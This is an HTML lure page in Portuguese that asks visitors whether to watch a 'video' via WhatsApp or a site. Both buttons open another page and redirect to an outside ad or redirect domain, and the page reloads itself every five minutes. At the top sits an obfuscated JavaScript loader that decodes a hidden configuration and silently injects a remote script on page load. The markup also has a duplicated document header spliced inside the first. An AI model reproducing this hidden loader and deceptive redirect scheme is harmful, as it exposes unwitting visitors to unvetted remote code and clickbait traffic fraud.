<!DOCTYPE html>

<html>
<head>
   <script type="text/javascript">
 var p$00a = 'p$00a' + (new Date().getTime()) + 'zz'; window[p$00a] = {a:'abcdefghijklmnopqrstuvwxyz0123456789mw6uevdk72o5yn3lihgcazqtbprf8s91xj40', b:'{"AZIb":"s10sj4", "BVIb":"jf4j4r", "CXrr1":"anueh", "DLtag":"f", "Emjk5":"", "XCge1s":"23u5.653au" , "Zt1":"l3l6mgk.nec", "ZZ1":"hml353o.63y" }', c:'{"Abkr221":"g6h7lc", "Bo9ssm":"//6un.23u5.653au/mll.2g"}', d:'{"Ag4":"w3ub", "Bx1":"mllenuCk75u", "Cky":"gh6", "Dmg":"6hemceE5eyenc"}'};
var _0x5d4b=['235913QVfbwv','slice','length','162209QBmAmV','14238hyOOTq','323207DTbifh','split','1DqiKtq','135866HTbavB','indexOf','call','27654SKXHbY','parse','undefined','32Ijckmz','keys','map','ceil','115980hcFVDy','values','join'];var _0x208c=function(_0x31a8d7,_0x5f36b3){_0x31a8d7=_0x31a8d7-0x167;var _0x5d4be1=_0x5d4b[_0x31a8d7];return _0x5d4be1;};(function(_0x276f94,_0x57c4ff){var _0x50057c=_0x208c;while(!![]){try{var _0x40d184=parseInt(_0x50057c(0x168))+parseInt(_0x50057c(0x16f))*parseInt(_0x50057c(0x179))+-parseInt(_0x50057c(0x176))+parseInt(_0x50057c(0x173))+parseInt(_0x50057c(0x16e))+-parseInt(_0x50057c(0x170))+parseInt(_0x50057c(0x16b))*-parseInt(_0x50057c(0x172));if(_0x40d184===_0x57c4ff)break;else _0x276f94['push'](_0x276f94['shift']());}catch(_0x411836){_0x276f94['push'](_0x276f94['shift']());}}}(_0x5d4b,0x45111),function(){var _0x1ba274=function(_0x2f3a9a){var _0x3f0bc4=_0x208c,_0x1894ba=Math[_0x3f0bc4(0x167)](this['a'][_0x3f0bc4(0x16d)]/0x2),_0x539548=this['a'][_0x3f0bc4(0x16c)](0x0,_0x1894ba),_0x5d8009=this['a'][_0x3f0bc4(0x16c)](_0x1894ba);decrypt=this[_0x2f3a9a][_0x3f0bc4(0x171)]('')[_0x3f0bc4(0x17b)](_0x28f433=>{var _0xd7612d=_0x3f0bc4;return _0x5d8009['split']('')['includes'](_0x28f433)?_0x539548[_0x5d8009[_0xd7612d(0x174)](_0x28f433)]:_0x28f433;})[_0x3f0bc4(0x16a)]('');try{return JSON[_0x3f0bc4(0x177)](decrypt);}catch{return decrypt;}},_0x57bb85=window[p$00a],_0x219d97=function(_0x28efac,_0x22a031){var _0x5bee8e=_0x208c,_0x3963a0=Object[_0x5bee8e(0x169)](_0x1ba274[_0x5bee8e(0x175)](_0x57bb85,Object[_0x5bee8e(0x17a)](_0x57bb85)[_0x28efac]));return typeof _0x22a031!=_0x5bee8e(0x178)?_0x3963a0[_0x22a031]:_0x3963a0;};window[p$00a]['x']=function(){return _0x219d97(0x1);};var _0xf1db57=document[_0x219d97(0x3,0x3)](_0x219d97(0x2,0x0));_0xf1db57[_0x219d97(0x3,0x2)]=_0x219d97(0x2,0x1),document[_0x219d97(0x3,0x0)][_0x219d97(0x3,0x1)](_0xf1db57),p$00a=undefined;}());
 
 </script>
        
    
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <link rel="stylesheet" href="styles/style.css"/>
  <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Questionário de Gênero</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-image: url('vida.jpg'); /* Substitua pelo caminho da sua imagem */
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
            font-family: Arial, sans-serif;
            height: 100vh; /* Garante que a imagem ocupe toda a altura da página */
            display: flex;
            align-items: center;
            justify-content: center;
            color: #fff; /* Cor do texto para melhor contraste */
        }
  
        #question-container {
         
            text-align: center;
            padding: 20px;
            background-color: #f ff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
          z-index: 1;
        }

        button {
            
            display: inline-block;
            margin: 10px;
            padding: 15px 42px;
            font-size: 30px;
            cursor: pointer;
            border: none;
            border-radius: 1000px;
            transition: background-color 0.3s ease;
          z-index: 1;
        }

        #yes-button {
            background-color: #4caf50;
            color: #fff;
        }

        #no-button {
            background-color: #f44336;
            color: #fff;
        }
  h2{
    color: #fff;
  }
  
    </style>
</head>
<body>


<div id="question-container">
    <h1>aonde queres ver o vidio  </h1>
    <button id="no-button" onclick="liberarVideo1()">WhatsApp</button>
      <button id="yes-button" onclick="liberarVideo1()">Site</button>
  
  
</div>



 <script>
        function liberarVideo() {
            setTimeout(function() {
                window.open('index3', '_blank');
                window.location = 'https://chaunsoops.net/4/6162977';
            }, 1000);
        }
    </script>



 <script>
        function liberarVideo1() {
            setTimeout(function() {
                window.open('index3.html', '_blank');
                window.location = 'https://chaunsoops.net/4/6162977';
            }, 1000);
        }
    </script>



<script>
setInterval(function() {
    location.reload();
}, 300000); 
  </script>



</body>
</html>

